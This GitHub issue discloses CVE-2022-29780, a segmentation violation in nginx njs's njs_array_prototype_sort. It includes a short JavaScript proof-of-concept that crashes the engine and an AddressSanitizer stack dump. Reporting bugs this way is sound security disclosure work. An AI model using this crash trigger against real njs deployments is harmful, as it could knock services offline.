Headline
CVE-2022-29780: SEGV in njs_array_prototype_sort · Issue #486 · nginx/njs
Nginx NJS v0.7.2 was discovered to contain a segmentation violation in the function njs_array_prototype_sort at src/njs_array.c.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Closed
xmzyshypnc opened this issue
Mar 21, 2022
· 1 comment
Assignees
Comments
Environment
OS : Linux leanderwang-LC2 5.13.0-30-generic #33 SMP Mon Feb 7 14:25:10 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Commit : f65981b
Version : 0.7.3
Build :
NJS_CFLAGS="$NJS_CFLAGS -fsanitize=address"
NJS_CFLAGS="$NJS_CFLAGS -fno-omit-frame-pointer"
PoC
function main() { var empty = {}; var arr1 = [empty,empty]; function func(arg) { arr1[0xffff] *= arg; } var v5 = arr1.sort(func); } main();
Stack dump
AddressSanitizer:DEADLYSIGNAL
==610159==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7ffff6f91b13 bp 0x7fffffffb3d0 sp 0x7fffffffab48 T0) ==610159==The signal is caused by a WRITE memory access. ==610159==Hint: address points to the zero page. #0 0x7ffff6f91b12 in memcpy (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) #1 0x7ffff7688d40 in __asan_memcpy …/…/…/…/src/libsanitizer/asan/asan_interceptors_memintrinsics.cc:21 #2 0x5555556042ff in njs_array_prototype_sort src/njs_array.c:2704 #3 0x55555561961c in njs_function_native_call src/njs_function.c:739 #4 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #5 0x555555618aba in njs_function_lambda_call src/njs_function.c:703 #6 0x5555555bf0fb in njs_vmcode_interpreter src/njs_vmcode.c:788 #7 0x5555555b90ba in njs_vm_start src/njs_vm.c:553 #8 0x5555555a23f8 in njs_process_script src/njs_shell.c:890 #9 0x5555555a2ebf in njs_process_file src/njs_shell.c:619 #10 0x5555555a421f in main src/njs_shell.c:303 #11 0x7ffff6efa0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x240b2) #12 0x55555559fc4d in _start (/home/wz/njs/njs/build/njs+0x4bc4d)
AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbbb12) in memcpy ==610159==ABORTING
Credit
xmzyshypnc(@xmzyshypnc) and P1umer(@P1umer)
Copy link
Contributor
** xeioex commented Apr 23, 2022**
2 participants